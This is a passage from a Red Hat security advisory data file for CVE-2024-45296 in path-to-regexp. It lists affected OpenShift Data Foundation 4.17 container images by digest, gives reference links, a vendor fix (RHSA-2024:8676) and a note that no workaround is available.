"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2024-45296", }, { category: "external", summary: "RHBZ#2310908", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2310908", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2024-45296", url: "https://www.cve.org/CVERecord?id=CVE-2024-45296", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2024-45296", url: "https://nvd.nist.gov/vuln/detail/CVE-2024-45296", }, { category: "external", summary: "https://github.com/pillarjs/path-to-regexp/commit/29b96b4a1de52824e1ca0f49a701183cc4ed476f", url: "https://github.com/pillarjs/path-to-regexp/commit/29b96b4a1de52824e1ca0f49a701183cc4ed476f", }, { category: "external", summary: "https://github.com/pillarjs/path-to-regexp/commit/60f2121e9b66b7b622cc01080df0aabda9eedee6", url: "https://github.com/pillarjs/path-to-regexp/commit/60f2121e9b66b7b622cc01080df0aabda9eedee6", }, { category: "external", summary: "https://github.com/pillarjs/path-to-regexp/security/advisories/GHSA-9wv6-86v2-598j", url: "https://github.com/pillarjs/path-to-regexp/security/advisories/GHSA-9wv6-86v2-598j", }, ], release_date: "2024-09-09T19:15:13.330000+00:00", remediations: [ { category: "vendor_fix", date: "2024-10-30T14:25:22+00:00", details: "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2024:8676", }, { category: "workaround", details: "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.", product_ids: [ "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64", "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64", 